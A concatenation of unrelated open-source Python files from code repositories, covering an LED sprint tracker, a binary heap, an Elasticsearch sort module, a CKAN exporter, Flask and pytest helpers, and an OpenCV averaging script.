7 2 [(0, 305), (1, 31)]
7 3 [(0, 275), (1, 38), (2, 2)]
8 1 [(0, 671), (1, 43)]
8 2 [(0, 831), (1, 53)]
8 3 [(0, 741), (1, 71), (2, 4)]
8 4 [(-2, 1), (-1, 1), (0, 778), (1, 64), (2, 6)]
9 1 [(0, 1799), (1, 71)]
9 2 [(0, 2223), (1, 87)]
9 3 [(0, 2011), (1, 127), (2, 6), (3, 1)]
9 4 [(-2, 2), (-1, 3), (0, 2061), (1, 122), (2, 12)]
10 1 [(0, 4779), (1, 116)]
10 2 [(0, 5905), (1, 147)]
10 3 [(0, 5374), (1, 220), (2, 11), (3, 2)]
10 4 [(-2, 4), (-1, 10), (0, 5519), (1, 228), (2, 22), (3, 2)]
10 5 [(-2, 6), (-1, 7), (0, 5419), (1, 236), (2, 28)]
'''
# For Python2 compatibility
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__metaclass__ = type
from .rankmatrices import RankMatrices
from .cdr_matrices import b_empty
from .cdr_matrices import b1
from .cdr_matrices import b2
from .cdr_matrices import rules_factory
from .cdr_matrices import rule_matrices_from_rules
from .cdr_matrices import cdr_print
# Start as clone of basic_matrices.
def candidate_11(word):
    # Prepend the b1 block to the word (generator yielding one candidate).
    yield b1 + word
def candidate_12(word):
    # NOTE(review): identical to candidate_11 (also prepends b1).  The
    # module header says this starts as a clone of the basic rules, so this
    # is presumably the intended starting point -- confirm before changing.
    yield b1 + word
def candidate_2(word):
    # Prepend the b2 block to the word (generator yielding one candidate).
    yield b2 + word
# Build the rule set and derive the rank matrices from it; per the comment
# above, this mirrors the construction of basic_rules in cdr_matrices.
candidate_rules = rules_factory(candidate_11, candidate_12, candidate_2)
candidate_rule_matrices = rule_matrices_from_rules(candidate_rules)
candidate_matrices = RankMatrices(matrices=candidate_rule_matrices)


if __name__ == '__main__':
    # Run the doctests in the module docstring above.
    import doctest
    print(doctest.testmod())
| mit | Python | |
51b72ace0e0041199c596074718c2f8b22f5de71 | Create stripmanager.py | freedom27/jira_sprint_ledstrip_tracker | stripmanager.py | stripmanager.py | import time
from neopixel import *
import datamanager
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
strip.begin()
def fill_strip_percentage(perc):
    """Light the leading `perc` fraction of the strip as a green-to-red ramp.

    Arguments:
        perc: progress fraction in [0.0, 1.0].
    """
    limit = int(LED_COUNT * perc)
    # Bug fix: clear *every* pixel, not only the first `limit`.  Previously,
    # when the percentage decreased, pixels above the new limit stayed lit.
    for i in range(LED_COUNT):
        strip.setPixelColor(i, 0)
    for i in range(limit):
        # ramp red up / green down proportionally to the pixel position
        delta = float(255) * (float(i) / float(LED_COUNT))
        strip.setPixelColorRGB(i, int(delta), int(255 - delta), 0)
    strip.show()
    time.sleep(0.2)
if __name__ == '__main__':
    old_perc = 0.0
    while True:
        # presumably an integer percentage (0-100) -- confirm against
        # datamanager.get_sprint_progress()
        progress = datamanager.get_sprint_progress()
        perc = float(progress)/100.0
        # only redraw the strip when the value actually changed
        if not old_perc == perc:
            old_perc = perc
            fill_strip_percentage(perc)
        # poll every 10 minutes
        time.sleep(600)
| mit | Python | |
a19aff3173a85ca8b0035873c3a6315d3dbedba4 | Create main.py | Python-IoT/Smart-IoT-Planting-System,Python-IoT/Smart-IoT-Planting-System | gateway/src/main.py | gateway/src/main.py | #!/usr/bin/env python
#Gateway main script.
#Communicate with end devices via LoRa.
#Communicate with server via MQTT(hbmqtt) and HTTP POST.
#Save data in the sqlite database.
#Parse JSON from MQTT and LoRa protocol.
| mit | Python | |
754a717c8abc0f6b2683071684420240ff0aef17 | add heap | haandol/algorithm_in_python | ds/heap.py | ds/heap.py | class BinHeap:
def __init__(self):
self.heap_list = [0]
self.size = 0
def siftup(self, i):
while i // 2 > 0:
if self.heap_list[i] < self.heap_list[i//2]:
self.heap_list[i//2], self.heap_list[i] = self.heap_list[i], self.heap_list[i//2]
i = i // 2
def insert(self, k):
self.heap_list.append(k)
self.size += 1
self.siftup(self.size)
def siftdown(self, i):
while (i*2) <= self.size:
mc = self.min_child(i)
if self.heap_list[i] > self.heap_list[mc]:
self.heap_list[i], self.heap_list[mc] = self.heap_list[mc], self.heap_list[i]
i = mc
def min_child(self, i):
if i*2+1 > self.size:
return i * 2
else:
if self.heap_list[i*2] < self.heap_list[i*2+1]:
return i*2
else:
return i*2+1
def pop(self):
v = self.heap_list[1]
self.heap_list[1] = self.heap_list[self.size]
self.size -= 1
self.heap_list.pop()
self.siftdown(1)
return v
def build_heap(self, L):
i = len(L) // 2
self.size = len(L)
self.heap_list = [0] + L
while i > 0:
self.siftdown(i)
i -= 1
if '__main__' == __name__:
heap = BinHeap()
L = [9, 6, 5, 3, 2]
heap.build_heap(L)
| mit | Python | |
58c604a8574ade75aecbd80314004a9539e80c84 | Add ?wv command for encouraging action | smarkets/hal | plugins/volunteers.py | plugins/volunteers.py | __commands__ = '''
?wv [name] - congratulates people on their public sprited gesture
'''
def plugin(bot):
    """Register the ?wv responses that congratulate volunteers."""
    def congratulate(response):
        name = response.match.group(1).strip()
        return "Well volunteered %s!" % name

    bot.hear(r'^\?wv$', "Well volunteered!")
    bot.hear(r'^\?wv\s(.+)$', congratulate)
| mit | Python | |
2d1fd9c81ca9f17270ecef6505830cb798632091 | initialize graph test file. | constanthatz/data-structures | test_simple_graph.py | test_simple_graph.py | #!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
# NOTE(review): placeholder scaffolding for simple-graph tests.  Every body
# below references a name that is never defined (nodes, edges, neighbors,
# condition), so calling any of these raises NameError; they only sketch
# the intended test surface and need real implementations.


def test_init(self):
    # `self` parameter on a module-level function -- presumably copied
    # from a TestCase class; confirm and drop it when implementing.
    return


def test_nodes():
    return nodes


def test_edges():
    return edges


def test_add_node(value):
    return


def test_add_edge(value1, value2):
    return


def test_del_node(value):
    return


def test_has_node(value):
    return


def test_neighbors(value):
    return neighbors


def test_adjecent(value, value2):
    return condition
| mit | Python | |
0f782c2ade2f58641688742d6fc1030f6259df40 | Add code to JSONize the dataset | bassosimone/nadia | nadia/jsonize.py | nadia/jsonize.py | # nadia/jsonize.py
#
# Copyright (c) 2011 Simone Basso <bassosimone@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
#
# When the dataset is ready, we export each line with JSON. The export
# tries to group fields in a CKAN-friendly way so that, ideally, one can
# load the json and pass it directly to ckan-client.
#
import sys
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
sys.stderr.write("nadia: with Python < 2.6 please install simplejson")
sys.exit(1)
if __name__ == "__main__":
sys.path.insert(0, ".")
from nadia.excel import open_sheet
from nadia.excel import row_values
from nadia.data import data_section
from nadia.yaxis import y_axis
from nadia.finalize import remove_empty_lines
from nadia.finalize import global_data
from nadia.finalize import global_const
from nadia.django import slugify
class CKANPackage(object):
    """Mutable holder for the fields of a single CKAN package entry."""

    def __init__(self):
        # simple string fields default to the empty (unicode) string
        self.author = u""
        self.name = u""
        self.title = u""
        self.url = u""
        # XXX notes is accumulated as a list and joined later by jsonize()
        self.notes = []
        self.tags = []
        self.extras = {}
def jsonize(data, fp, indent=None):
    """Write each data row to `fp` as one JSON-encoded CKAN package.

    `data[0]` holds the column headers; the remaining rows are mapped onto
    CKANPackage fields so the output can be fed to ckanclient.
    """
    headers = data[0]
    body = data[1:]
    # NOTE(review): starting at 1 skips body[0], i.e. the *second* data row
    # is the first one exported -- confirm whether row 0 is intentionally a
    # header/units row or whether this is an off-by-one.
    for i in range(1, len(body)):
        package = CKANPackage()
        row = body[i]
        #
        # The algorithm here matches loosely the one that has been
        # implemented in <ckanload-italy-nexa>.
        #
        for j in range(0, len(row)):
            cell = row[j]
            header = headers[j]
            # several source column names map onto the same CKAN field
            if (header == "datasource" or header == "istituzione" or
                header == "author"):
                package.author = cell
                continue
            if header == "name":
                package.name = cell
                continue
            if header == "url":
                package.url = cell
                continue
            # free-text columns are collected and later joined into notes
            if (header == "tipologia di dati" or
                header == "diritti sul database"):
                package.notes.append(cell)
                continue
            if header == "title":
                package.title = cell
                continue
            if header == "category":
                # tags must be machine friendly: lowercase, dash-separated
                package.tags.append(cell.lower().replace(" ", "-"))
                continue
            # any unrecognised column is preserved in the extras mapping
            package.extras[header] = cell
        # XXX
        package.notes = "\n\n".join(package.notes)
        #
        # As suggested by steko, the machine readable name must
        # be prepended with a slugified version of the name of the
        # dataset author.
        # While on that, make sure the author name is not all-
        # uppercase because that looks ugly.
        #
        package.author = package.author.lower()
        name = slugify(package.author)
        if not package.name.startswith(name):
            package.name = name + "_" + package.name
        #
        # AFAIK vars() here will work as long as all the variables of
        # `package` have been initialized using __init__(). This is
        # what the code above already does. Nonetheless I whish to add
        # this comment for future robusteness of the code.
        #
        octets = json.dumps(vars(package), indent=indent)
        fp.write(octets)
        fp.write("\n")
if __name__ == "__main__":
sheet = open_sheet("test/sample1.xls")
data = data_section(sheet, "C3:R6", "C7:R24")
y_axis(sheet, "B7:B24", data)
data = remove_empty_lines(data)
global_data(data, sheet, "author", "A10")
global_data(data, sheet, "url", "A11")
global_data(data, sheet, "mission", "A12")
global_const(data, "category", "geodati")
jsonize(data, sys.stdout, 4)
| isc | Python | |
87eab562e847d7cdde7867c41453b10add376fba | Add test script | ikegami-yukino/madoka-python,ikegami-yukino/madoka-python | test_madoka.py | test_madoka.py | # -*- coding: utf-8 -*-
from nose.tools import eq_, ok_
import madoka
import os
class Test_madoka(object):
def test_inc(self):
sketch = madoka.Sketch()
sketch.inc('mami', 3)
eq_(1, sketch.get('mami', 3))
sketch.inc('mami', 3)
eq_(2, sketch.get('mami', 3))
def test_add(self):
sketch = madoka.Sketch()
sketch.add('mami', 3, 2)
eq_(2, sketch.get('mami', 3))
sketch.add('mami', 3, 8)
eq_(10, sketch.get('mami', 3))
def test_set(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
eq_(14, sketch.get('mami', 3))
def test_clear(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
sketch.clear()
eq_(0, sketch.get('mami', 3))
def test_create(self):
sketch = madoka.Sketch()
sketch.create(max_value=4)
sketch.set('mami', 3, 100)
eq_(15, sketch.get('mami', 3))
def test_copy(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
new_sketch = madoka.Sketch()
new_sketch.copy(sketch)
eq_(14, new_sketch.get('mami', 3))
def test_merge(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
new_sketch = madoka.Sketch()
new_sketch.set('mami', 3, 14)
new_sketch.merge(sketch)
eq_(28, new_sketch.get('mami', 3))
def test_filter(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 3)
sketch.filter(lambda x: x**2)
eq_(9, sketch.get('mami', 3))
def test_inner_product(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 2)
sketch.set('homura', 3, 1)
sketch.set('kyouko', 3, 2)
sketch.set('sayaka', 3, 2)
new_sketch = madoka.Sketch()
new_sketch.set('mami', 3, 2)
new_sketch.set('kyouko', 3, 3)
new_sketch.set('sayaka', 3, 10)
eq_(30, new_sketch.inner_product(sketch))
def test_save_and_load(self):
try:
filename = 'test.madoka'
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
sketch.save(filename)
ok_(os.path.exists(filename))
sketch = madoka.Sketch()
sketch.load(filename)
eq_(14, sketch.get('mami', 3))
finally:
os.remove(filename)
| bsd-3-clause | Python | |
100c2bb05d002c5b07e0d6ae4a242346e1362c2b | Create condition.py | gmambro/colino | colino/condition.py | colino/condition.py | from __future__ import (absolute_import, division,
print_function, unicode_literals)
class Condition(object):
    """Compiled form of a condition model.

    Holds the Python expression generated from the model, the variables it
    references, and any objects (e.g. compiled regexes) needed when the
    condition is evaluated.
    """

    def __init__(self, condition_model):
        # used for holding objects like compiled regexes
        self.init_context = {}
        # names referenced by the condition expression
        self.variables = set()
        # the condition python code
        self.code = self.compile(condition_model)

    def compile(self, condition_model):
        """Create a valid Python expression from a condition model.

        NOTE(review): still a stub -- it returns None, so self.code is
        always None until this is implemented.
        """
        # TODO recursive descent into model, one method per model class
        pass
| apache-2.0 | Python | |
cf6172353ad5f73185b8de0d60510a0713aa9895 | Transform omorfi tagged text into finnpos format. | mpsilfve/FinnPos,mpsilfve/FinnPos,mpsilfve/FinnPos,mpsilfve/FinnPos | bin/omorfi2finnpos.py | bin/omorfi2finnpos.py | from sys import stdin, argv, stderr
from re import findall
def get_lemma(string, convert_type):
    """Extract the lemma from one analysis line.

    For 'ftb', every [WORD_ID=...] bracket contributes one compound part,
    joined with '#'.  Otherwise ('tdt') the lemma is the text before the
    first tab.
    """
    if convert_type != 'ftb':
        return string[:string.find('\t')]
    # strip the '[WORD_ID=' prefix and ']' suffix from each match
    parts = [match[9:-1] for match in findall('\[WORD_ID=[^\]]*\]', string)]
    return '#'.join(parts)
def get_label(string, convert_type):
    """Extract the morphological label from one analysis line.

    For 'ftb' the label is everything after the last lemma, with sub-labels
    separated by '|' and STYLE=/DRV= tags removed.

    NOTE(review): the non-ftb branch keeps the leading tab character in the
    returned label (find('\t'), not find('\t') + 1) -- confirm this is what
    the downstream consumer expects.
    """
    if convert_type != 'ftb':
        return string[string.find('\t'):]
    # drop everything up to and including the last '[WORD_ID=' marker ...
    tail = string[string.rfind('[WORD_ID=') + len('[WORD_ID='):]
    # ... and the lemma itself, leaving only the label brackets
    label = tail[tail.find(']') + 1:].replace('][', ']|[')
    kept = [
        part for part in label.split('|')
        if part.find("STYLE=") == -1 and part.find("DRV=") == -1
    ]
    return '|'.join(kept)
def convert(ifile, convert_type):
    """Read omorfi-tagged lines from `ifile` and print them in FinnPos
    format: wordform, two '_' placeholder columns, the space-separated
    label sequence, and the de-duplicated (label, lemma) candidate list.

    convert_type is 'ftb' (wordform TAB analysis) or 'tdt' (wordform TAB
    lemma TAB label).
    """
    wf = ''
    labels = ''
    lemmas = []
    for line in ifile:
        line = line.strip()
        # a blank line ends the current token's analyses: flush it
        if line == '' and wf != '':
            lemmas = list(set(lemmas))
            print('%s\t%s\t%s\t%s\t%s' % (wf, '_', '_', labels, str(lemmas)))
            wf, labels, lemmas = '', '', []
        elif line == '':
            continue
        # sentence boundary markers differ between the two formats
        elif (convert_type == 'ftb' and
              line == 'OMORFI_VERSION_≥_14_©_GNU_GPL_V3'):
            print('')
            entry = ''  # NOTE(review): `entry` is written but never read
        elif convert_type == 'tdt' and line.find('<END>') != -1:
            print('')
            entry = ''
        else:
            if convert_type == 'ftb':
                wf, analysis = line.split('\t')
                # '+?' marks an unknown word with no analysis
                if analysis == '+?':
                    labels = '_'
                else:
                    label = get_label(analysis, convert_type)
                    lemma = get_lemma(analysis, convert_type)
                    if labels != '':
                        labels += ' '
                    labels += label
                    lemmas.append((label, lemma))
            else:
                wf, lemma, label = line.split('\t')
                lemma = lemma.replace('|','')
                if label == '+?':
                    labels = '_'
                else:
                    if labels != '':
                        labels += ' '
                    labels += label
                    lemmas.append((label, lemma))
    # NOTE(review): a final buffered token is silently dropped when the
    # input does not end with a blank line -- confirm the upstream format
    # always guarantees a trailing blank line.
if __name__=='__main__':
convert_type = 'ftb'
if len(argv) == 2:
convert_type = argv[1]
elif len(argv) != 1:
stderr.write('USE: cat indata | %s (ftb|tdt) > outdata\n' % argv[0])
exit(1)
if not convert_type in ['ftb','tdt']:
stderr.write('Unknown conversion type %s. Should be ftb or tdt.' %
convert_type)
exit(1)
convert(stdin, convert_type)
| apache-2.0 | Python | |
723a7ef13c34bf6e292377db9849753d34b4d0d1 | add new helper to display completion on learner dashboard | appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform | openedx/core/djangoapps/appsembler/html_certificates/helpers.py | openedx/core/djangoapps/appsembler/html_certificates/helpers.py | """
Appsembler Helpers to improve course info in learner dashboard.
We should remove this after Maple, since all the info is in the new course_home_api.
"""
import beeline
from xmodule.modulestore.django import modulestore
from common.djangoapps.student.helpers import cert_info
from lms.djangoapps.course_blocks.api import get_course_blocks
@beeline.traced('html_certificates.get_course_blocks_completion_summary')
def get_course_blocks_completion_summary(course_key, user):
"""
Returns an object with the number of complete units, incomplete units, and units that contain gated content
for the given course. The complete and incomplete counts only reflect units that are able to be completed by
the given user. If a unit contains gated content, it is not counted towards the incomplete count.
The object contains fields: complete_count, incomplete_count, locked_count
"""
if not user.id:
return {}
beeline.add_context_field('username', user.username)
beeline.add_context_field('course_key', course_key)
store = modulestore()
course_usage_key = store.make_course_usage_key(course_key)
block_data = get_course_blocks(user, course_usage_key, allow_start_dates_in_future=True, include_completion=True)
complete_count, incomplete_count, locked_count = 0, 0, 0
for section_key in block_data.get_children(course_usage_key): # pylint: disable=too-many-nested-blocks
for subsection_key in block_data.get_children(section_key):
for unit_key in block_data.get_children(subsection_key):
complete = block_data.get_xblock_field(unit_key, 'complete', False)
contains_gated_content = block_data.get_xblock_field(unit_key, 'contains_gated_content', False)
if contains_gated_content:
locked_count += 1
elif complete:
complete_count += 1
else:
incomplete_count += 1
return {
'complete_count': complete_count,
'incomplete_count': incomplete_count,
'locked_count': locked_count
}
| agpl-3.0 | Python | |
898e1692ed87890cf77a7534e3c51afed112a131 | add a top-level __init__.py with imports of the main classes | pyreaclib/pyreaclib | pyreaclib/__init__.py | pyreaclib/__init__.py | """
pyreaclib is a python module that interprets the nuclear reaction rates
cataloged by the JINA ReacLib project:
https://groups.nscl.msu.edu/jina/reaclib/db/
It provides both interactive access to the rates, for use in Jupyter
notebooks as well as methods for writing python and Fortran nuclear
reaction networks, including the the righthand side and Jacobian
routines.
"""
__version__ = "1.0"
from pyreaclib.networks import \
RateCollection, \
Composition, \
Explorer, \
PythonNetwork, \
BaseFortranNetwork, \
BoxLibNetwork, \
SundialsNetwork
| bsd-3-clause | Python | |
a7a20eacc94f1bca2baf5c37632f116e34f2f079 | Create data_cleansed.py | searchs/bigdatabox,searchs/bigdatabox | data_cleansed.py | data_cleansed.py | # Data Cleansing
import pandas as pd
df = pd.DataFrame()
# 1. Explore data: df.head(), df.tail(), df.info(), df.describe()
# Check NULL values totals: df.isna().sum()
# 2. Drop NaValues: df.dropna(inplace=True)
# 3. Deal with Duplicates: df.duplicated().value_counts()
''' A general rule of thumb is to ignore the duplicate values if they are less
than 0.5%. This is because, if the proportion is very low, duplicate values can
also be because of chance. If it is higher than 0.5%, you can check if the
consecutive values are duplicate. If the consecutive values are duplicate, you can
drop them.'''
df.loc[(df['col_1'].diff() != 0) |
(df['col_2'].diff() != 0) |
(df['col_3'].diff() != 0) |
(df['col_4'].diff() != 0)
]
# 4. Row count: df.shape[0]
# 5. Deal with outliers: df['returns'] = df['close'].pct_change()
| mit | Python | |
d90bb9ddfbac20fa9ae7d7ecf37064cb8a86b26e | add algorithm which choose the node with largest degree to query | ryaninhust/sampling | degree_largest.py | degree_largest.py | from random import sample,random,choice
from core import Algorithm
from egraphs import FBEgoGraph
class DegreeLargest(Algorithm):
    def update_graph(self, start_node, new_node):
        """Merge a queried vertex into the sampled igraph graph.

        `new_node` is a vertex-attribute dict (must contain 'name'); the
        vertex is added if unseen and connected to `start_node`, avoiding
        duplicate edges.
        """
        g = self.sampled_graph
        start_id = g.vs['name'].index(start_node)
        if new_node['name'] not in g.vs['name']:
            # unseen vertex: add it with all its attributes, then link it
            g.add_vertex(**new_node)
            index = g.vs['name'].index(new_node['name'])
            g.add_edge(start_id,index)
        else:
            index = g.vs['name'].index(new_node['name'])
            # get_eid() returns -1 when the edge is absent, so the edge is
            # only added once
            if g.get_eid(start_id, index, directed=False, error=False) == -1:
                g.add_edge(start_id,index)
    def degree_largest(self):
        """Return the index of the vertex with the most unexplored edges
        (degree in the full graph minus degree in the sampled graph)."""
        # 'degree' vertex attribute holds the full-graph degree ...
        full_degree = self.sampled_graph.vs['degree']
        # ... while .degree() is the degree inside the sampled subgraph
        sample_degree = self.sampled_graph.degree()
        difference = [x1 - x2 for (x1, x2) in zip(full_degree, sample_degree)]
        return difference.index(max(difference))
    def run(self,k):
        """Perform k queries, each time expanding the vertex with the
        largest unexplored degree, merging every result into the graph."""
        # presumably excludes two bookkeeping attributes (e.g. 'name' and
        # 'degree') from the payload count -- TODO confirm
        n_attribute = len(self.sampled_graph.vertex_attributes())-2
        i = 0
        while i < k:
            query_node = self.sampled_graph.vs['name'][self.degree_largest()]
            query_result = self.egraph.query_node(query_node,n_attribute)
            self.update_graph(query_node,query_result)
            i += 1
if __name__ == "__main__":
fbego_graph = FBEgoGraph('data/egofb.txt')
fuck_rj = RandomJump(fbego_graph)
print fuck_rj.validate() | mit | Python | |
7b4f3784f3c27e861b2b741fe2a02c82a97e8fb9 | change storage test file name | DvA-leopold/CrAB,DvA-leopold/CrAB | blockchain_storage/tests.py | blockchain_storage/tests.py | import hashlib
import leveldb

# NOTE(review): hard-coded absolute path -- this only runs on the original
# author's machine, and create_if_missing=False requires the db to exist.
database = leveldb.LevelDB('/home/operator/PycharmProjects/CrAB/db', create_if_missing=False)

# `hash` shadows the builtin of the same name (acceptable in this script)
hash = hashlib.sha256('data'.encode())
print('hash: ', hash.digest())

# round-trip one key/value pair keyed by the sha256 digest
database.Put(hashlib.sha256('data'.encode()).digest(), 'something'.encode())
print(database.Get(hashlib.sha256('data'.encode()).digest()))
| mpl-2.0 | Python | |
40ad674ae170347ed69b19434241438bb09e473d | Define decorator for requiring login | ueg1990/customer-info,ueg1990/customer-info | app/decorators.py | app/decorators.py | from functools import wraps
from flask import redirect, session, url_for
def login_required(f):
    """Decorator: redirect anonymous users to the login page before `f`."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        # guard clause: bounce to the public login view unless logged in
        if not session.get('logged_in', False):
            return redirect(url_for('public.login'))
        return f(*args, **kwargs)
    return wrapper
| apache-2.0 | Python | |
855a8550c6bd6e1a16700610e07f9192f9907125 | move sort to its own module | Fiedzia/pyes,HackLinux/pyes,mavarick/pyes,HackLinux/pyes,aparo/pyes,haiwen/pyes,HackLinux/pyes,mavarick/pyes,aparo/pyes,haiwen/pyes,haiwen/pyes,jayzeng/pyes,mavarick/pyes,Fiedzia/pyes,jayzeng/pyes,Fiedzia/pyes,jayzeng/pyes,aparo/pyes | pyes/sort.py | pyes/sort.py | from .exceptions import InvalidSortOrder
from .utils import EqualityComparableUsingAttributeDictionary
class SortOrder(EqualityComparableUsingAttributeDictionary):
"""
Defines sort order
"""
MODE_MIN = 'min'
MODE_MAX = 'max'
MODE_SUM = 'sum' # not available for geo sorting
MODE_AVG = 'avg'
MODES = (MODE_MIN, MODE_MAX, MODE_SUM, MODE_AVG)
def __init__(self, field=None, order=None, mode=None, nested_path=None,
nested_filter=None, missing=None, ignore_unmapped=None):
self.field = field
self.mode = mode
self.order = order
self.nested_path = nested_path
self.nested_filter = nested_filter
self.missing = missing
self.ignore_unmapped = ignore_unmapped
def serialize_order_params(self):
res = {}
if self.order:
res['order'] = self.order
if self.mode:
res['mode'] = self.mode
if self.nested_path:
res['nested_path'] = self.nested_path
if self.nested_filter:
res['nested_filter'] = self.nested_filter.serialize()
if self.missing:
res['missing'] = self.missing
if self.ignore_unmapped is not None:
res['ignore_unmapped'] = self.ignore_unmapped
return res
def serialize(self):
"""Serialize the search to a structure as passed for a search body."""
if not self.field:
raise InvalidSortOrder('sort order must contain field name')
return {self.field: self.serialize_order_params()}
def __repr__(self):
return str(self.serialize())
class GeoSortOrder(SortOrder):
def __init__(self, lat=None, lon=None, geohash=None, unit=None,
**kwargs):
super(GeoSortOrder, self).__init__(**kwargs)
self.lat = lat
self.lon = lon
self.geohash = geohash
self.unit = unit
def serialize_order_params(self):
res = super(GeoSortOrder, self).serialize_order_params()
if self.geohash:
res[self.field] = self.geohash
elif self.lat is not None and self.lon is not None:
res[self.field] = [self.lat, self.lon]
else:
raise InvalidSortOrder('Either geohash or lat and lon must be set')
if self.unit:
res['unit'] = self.unit
return res
def serialize(self):
res = {
'_geo_distance': self.serialize_order_params()
}
return res
class ScriptSortOrder(SortOrder):
    """Sort order driven by a server-side script."""

    def __init__(self, script, type=None, params=None, **kwargs):
        # Bug fix: this previously called super(GeoSortOrder, self), which
        # raises TypeError because GeoSortOrder is not in this class's MRO.
        super(ScriptSortOrder, self).__init__(**kwargs)
        self.script = script
        self.type = type
        self.params = params

    def serialize(self):
        # TODO: serialization of script sorts is not implemented yet.
        pass
class SortFactory(EqualityComparableUsingAttributeDictionary):
"""
Container for SortOrder objects
"""
def __init__(self):
self.sort_orders = []
def serialize(self):
"""Serialize the search to a structure as passed for a search body."""
res = []
for _sort in self.sort_orders:
res.append(_sort.serialize())
return res
def __repr__(self):
return str(self.serialize())
def add(self, sort_order):
"""Add sort order"""
self.sort_orders.append(sort_order)
def reset(self):
"""Reset sort orders"""
self.sort_orders = []
| bsd-3-clause | Python | |
f608e18aa9fa2d13ce5a08f63ab44b942678ff5d | convert avg_face_maker from ipynb to .py and commit | andrewjtimmons/selfieexpression | avg_face_maker.py | avg_face_maker.py | """Create an average face from a list of faces"""
import numpy as np
import cv2
import sqlite3
import json
conn = sqlite3.connect("face.db")
c = conn.cursor()
faces_data = c.execute("SELECT * FROM (SELECT * FROM faces) as t1 inner join (select rowid, instagram_id from images) as t2 on t1.image_table_id = t2.rowid").fetchall()
ids_and_rois = [(x[10], x[2]) for x in faces_data]
cropped_faces = np.zeros((640,640))
for ig_id, face_roi in ids_and_rois:
img = cv2.imread('grayscale_images/'+ig_id+".jpg",0)
face_roi = json.loads(face_roi)
if img is not None:
cropped_img = img[face_roi[1]:face_roi[1]+face_roi[3], face_roi[0]:face_roi[0]+face_roi[2]]
resized_image = cv2.resize(cropped_img, (640, 640))
cropped_faces += resized_image
avg_face = cropped_faces/len(ids_and_rois)
avg_face = avg_face.astype(np.uint8)
cv2.imshow('img',avg_face)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.imwrite("avg_face_from_numpy_large"+".jpg", avg_face) | mit | Python | |
15dca96debdc04d18ef69e457dc0c41e5288d99b | create fields.py so you don't have to specify trix fields in the admin | istrategylabs/django-trix,istrategylabs/django-trix,istrategylabs/django-trix | trix/fields.py | trix/fields.py | from django.db import models
from trix.widgets import TrixEditor
class TrixField(models.TextField):
    """TextField whose form widget is the Trix rich-text editor.

    Declaring model fields with this class makes the TrixEditor widget the
    default, so trix fields need not be listed per ModelAdmin.
    """

    def formfield(self, **kwargs):
        # force the TrixEditor widget, overriding any widget passed in
        kwargs.update({'widget': TrixEditor})
        return super(TrixField, self).formfield(**kwargs)
| mit | Python | |
2572feea64ee5e4556763132d0663fe4412fe369 | Add fixtures to test_journal.py and add test for write_entry method. | bm5w/learning-journal,bm5w/learning-journal | test_journal.py | test_journal.py | # -*- coding: utf-8 -*-
from contextlib import closing
from pyramid import testing
import pytest
from journal import connect_db
from journal import DB_SCHEMA
TEST_DSN = 'dbname=test_learning_journal user=mark'
def init_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute(DB_SCHEMA)
db.commit()
def clear_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DROP TABLE entries")
db.commit()
def clear_entries(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DELETE FROM entries")
db.commit()
def run_query(db, query, params=(), get_results=True):
    """Execute `query` with `params` on `db`, commit, and optionally
    return all result rows (None when get_results is False)."""
    cur = db.cursor()
    cur.execute(query, params)
    db.commit()
    if not get_results:
        return None
    return cur.fetchall()
def test_write_entry(req_context):
    """write_entry must insert exactly one row with the submitted fields."""
    from journal import write_entry
    fields = ('title', 'text')
    expected = ('Test Title', 'Test Text')
    # simulate the POSTed form data on the mocked request
    req_context.params = dict(zip(fields, expected))

    # assert that there are no entries when we start
    rows = run_query(req_context.db, "SELECT * FROM entries")
    assert len(rows) == 0

    # return value is unused; write_entry persists via req_context.db
    result = write_entry(req_context)
    # manually commit so we can see the entry on query
    req_context.db.commit()

    rows = run_query(req_context.db, "SELECT title, text FROM entries")
    assert len(rows) == 1
    actual = rows[0]
    # column order in the SELECT matches the order of `expected`
    for idx, val in enumerate(expected):
        assert val == actual[idx]
@pytest.fixture(scope='session')
def db(request):
"""set up and tear down a database"""
settings = {'db': TEST_DSN}
init_db(settings)
def cleanup():
clear_db(settings)
request.addfinalizer(cleanup)
return settings
@pytest.yield_fixture(scope='function')
def req_context(db, request):
"""mock a request with a database attached"""
settings = db
req = testing.DummyRequest()
with closing(connect_db(settings)) as db:
req.db = db
req.exception = None
yield req
# after a test has run, we clear out entries for isolation
clear_entries(settings) | mit | Python | |
